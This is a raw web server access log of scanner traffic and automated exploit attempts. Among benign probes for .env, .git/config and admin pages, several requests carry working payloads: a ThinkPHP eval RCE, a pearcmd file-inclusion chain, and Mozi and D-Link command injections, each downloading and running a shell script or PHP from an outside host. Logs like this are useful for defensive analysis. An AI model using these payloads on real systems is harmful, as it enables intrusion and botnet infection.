138.68.224.69 - - [04/Feb/2024:00:51:43 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
138.68.224.69 - - [04/Feb/2024:00:51:52 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
138.68.224.69 - - [04/Feb/2024:00:52:51 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
146.19.24.23 - - [04/Feb/2024:00:52:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [04/Feb/2024:00:53:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [04/Feb/2024:00:54:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
165.154.206.250 - - [04/Feb/2024:00:55:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
165.154.206.250 - - [04/Feb/2024:00:55:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.154.206.250 - - [04/Feb/2024:00:55:29 +0100] "t3 12.1.2" 400 329 "-" "-"
45.79.181.223 - - [04/Feb/2024:01:06:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.255.247.38 - - [04/Feb/2024:01:08:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
35.202.9.133 - - [04/Feb/2024:01:08:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
176.97.210.231 - - [04/Feb/2024:01:09:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.172.21 - - [04/Feb/2024:01:11:10 +0100] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.224 - - [04/Feb/2024:01:13:38 +0100] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.224 - - [04/Feb/2024:01:13:38 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
176.97.210.229 - - [04/Feb/2024:01:14:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.131.111.142 - - [04/Feb/2024:01:17:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.131.111.142 - - [04/Feb/2024:01:17:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.172.21 - - [04/Feb/2024:01:17:55 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.95.147.245 - - [04/Feb/2024:01:20:53 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
65.49.1.20 - - [04/Feb/2024:01:32:30 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.228 - - [04/Feb/2024:01:34:28 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
18.171.235.0 - - [04/Feb/2024:01:47:52 +0100] "\xd6\xa0\xee\xbb@\x8d\x05N`\x18\x04\xb0\xb6g" 501 329 "-" "-"
45.95.147.236 - - [04/Feb/2024:01:49:11 +0100] "GET /?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index.php HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [04/Feb/2024:01:49:11 +0100] "GET /index.php?lang=../../../../../../../../tmp/index HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [04/Feb/2024:01:49:11 +0100] "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSk7IGNkIC90bXAvJCh3aG9hbWkpOyB3Z2V0IGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIC1PLSB8IHNoOyBjdXJsIGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIHwgc2g=|base64${IFS}-d|sh HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [04/Feb/2024:01:49:12 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='eval(base64_decode(\"aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9\"));' HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [04/Feb/2024:01:49:12 +0100] "GET /public/index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='eval(base64_decode(\"aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9\"));' HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
18.171.235.0 - - [04/Feb/2024:01:52:01 +0100] "b\xf5\xd76\t\x18\x9e\xa3`\x18\x04\xb0\x14\xac" 400 329 "-" "-"
45.131.111.142 - - [04/Feb/2024:01:55:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
64.62.197.157 - - [04/Feb/2024:02:00:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
64.62.197.202 - - [04/Feb/2024:02:00:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
65.49.1.112 - - [04/Feb/2024:02:00:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
64.62.197.201 - - [04/Feb/2024:02:02:04 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.62.197.156 - - [04/Feb/2024:02:02:04 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.62.197.201 - - [04/Feb/2024:02:02:42 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
64.62.197.158 - - [04/Feb/2024:02:02:50 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
65.49.1.111 - - [04/Feb/2024:02:03:06 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
65.49.1.120 - - [04/Feb/2024:02:03:35 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
65.49.1.49 - - [04/Feb/2024:02:03:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0"
170.64.128.231 - - [04/Feb/2024:02:04:44 +0100] "GET http://165.232.135.20/212.91.246.81 HTTP/1.1" 404 319 "-" "Mozilla/0 (Project 25499 Scanner)"
65.49.1.47 - - [04/Feb/2024:02:05:32 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0"
65.49.1.48 - - [04/Feb/2024:02:06:04 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0"
176.97.210.229 - - [04/Feb/2024:02:06:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
73.75.104.118 - - [04/Feb/2024:02:06:44 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
185.196.8.126 - - [04/Feb/2024:02:09:51 +0100] "GET /sources/.git/config HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36"
185.196.8.126 - - [04/Feb/2024:02:09:51 +0100] "GET /includes/.git/config HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36"
185.196.8.126 - - [04/Feb/2024:02:09:51 +0100] "GET /src/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 OPR/85.0.4341.75"
45.79.168.172 - - [04/Feb/2024:02:15:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.33.80.243 - - [04/Feb/2024:02:15:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
208.100.26.236 - - [04/Feb/2024:02:16:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Android 7.0; Mobile; rv:65.0) Gecko/65.0 Firefox/65.0"
146.19.24.23 - - [04/Feb/2024:02:23:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [04/Feb/2024:02:24:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [04/Feb/2024:02:26:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [04/Feb/2024:02:29:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [04/Feb/2024:02:34:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [04/Feb/2024:02:35:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.180.143.49 - - [04/Feb/2024:02:35:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.49 - - [04/Feb/2024:02:35:29 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
198.235.24.211 - - [04/Feb/2024:02:36:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.211 - - [04/Feb/2024:02:36:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.23 - - [04/Feb/2024:02:38:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.131.111.142 - - [04/Feb/2024:02:39:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.216.149.57 - - [04/Feb/2024:02:43:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.95.147.245 - - [04/Feb/2024:02:45:39 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
156.146.62.139 - - [04/Feb/2024:02:46:29 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.91.223.136/reallynightmare.sh?dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
3.87.237.27 - - [04/Feb/2024:02:54:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/58.0.3069.52 Safari/537.32"
176.97.210.231 - - [04/Feb/2024:02:57:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
165.154.11.181 - - [04/Feb/2024:03:03:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
165.154.11.181 - - [04/Feb/2024:03:03:31 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.154.11.181 - - [04/Feb/2024:03:03:32 +0100] "t3 12.1.2" 400 329 "-" "-"
192.241.219.39 - - [04/Feb/2024:03:12:15 +0100] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.39 - - [04/Feb/2024:03:12:24 +0100] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.39 - - [04/Feb/2024:03:12:25 +0100] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.39 - - [04/Feb/2024:03:12:41 +0100] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.39 - - [04/Feb/2024:03:12:46 +0100] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.39 - - [04/Feb/2024:03:13:10 +0100] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.39 - - [04/Feb/2024:03:13:28 +0100] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.39 - - [04/Feb/2024:03:13:34 +0100] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
205.210.31.82 - - [04/Feb/2024:03:14:00 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.82 - - [04/Feb/2024:03:14:00 +0100] "\x16\x03\x01" 501 318 "-" "-"
192.241.219.39 - - [04/Feb/2024:03:14:00 +0100] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.39 - - [04/Feb/2024:03:14:28 +0100] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
176.97.210.229 - - [04/Feb/2024:03:18:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.128.7 - - [04/Feb/2024:03:22:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:23:11 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:23:11 +0100] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:23:11 +0100] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:23:12 +0100] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:23:12 +0100] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:23:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:23:12 +0100] "GET /favicon-32x32.png HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:23:12 +0100] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
38.158.93.7 - - [04/Feb/2024:03:23:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:23:50 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:24:22 +0100] "GET /sugar_version.json HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:24:54 +0100] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:25:25 +0100] "GET /index.jsp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:26:02 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:26:40 +0100] "GET /api/session/properties HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:27:18 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:27:58 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
35.203.211.51 - - [04/Feb/2024:03:28:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.156.128.7 - - [04/Feb/2024:03:28:39 +0100] "GET /admin/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:28:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:28:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:28:40 +0100] "GET /static/historypage.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:29:20 +0100] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.7 - - [04/Feb/2024:03:29:53 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
47.251.14.232 - - [04/Feb/2024:03:30:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.101.3 - - [04/Feb/2024:03:30:39 +0100] "GET /Public/home/js/check.js HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.6.178 - - [04/Feb/2024:03:30:40 +0100] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
45.128.232.191 - - [04/Feb/2024:03:31:25 +0100] "POST /login.cgi HTTP/1.1" 404 314 "http://212.91.246.83:80/login.htm" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.128.232.191 - - [04/Feb/2024:03:37:06 +0100] "POST /login.cgi HTTP/1.1" 404 314 "http://212.91.246.87:80/login.htm" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.33.87.154 - - [04/Feb/2024:03:37:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.220 - - [04/Feb/2024:03:37:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
87.236.176.152 - - [04/Feb/2024:03:40:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
176.97.210.229 - - [04/Feb/2024:03:43:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.191 - - [04/Feb/2024:03:45:32 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
78.153.140.224 - - [04/Feb/2024:03:45:33 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.224 - - [04/Feb/2024:03:45:33 +0100] "\x16\x03\x01" 501 318 "-" "-"
192.155.88.231 - - [04/Feb/2024:03:46:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.33.80.243 - - [04/Feb/2024:03:46:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
109.78.36.231 - - [04/Feb/2024:03:48:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.33.87.154 - - [04/Feb/2024:03:50:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.95.147.236 - - [04/Feb/2024:03:50:18 +0100] "GET /?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index.php HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [04/Feb/2024:03:50:18 +0100] "GET /index.php?lang=../../../../../../../../tmp/index HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [04/Feb/2024:03:50:18 +0100] "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSk7IGNkIC90bXAvJCh3aG9hbWkpOyB3Z2V0IGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIC1PLSB8IHNoOyBjdXJsIGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIHwgc2g=|base64${IFS}-d|sh HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
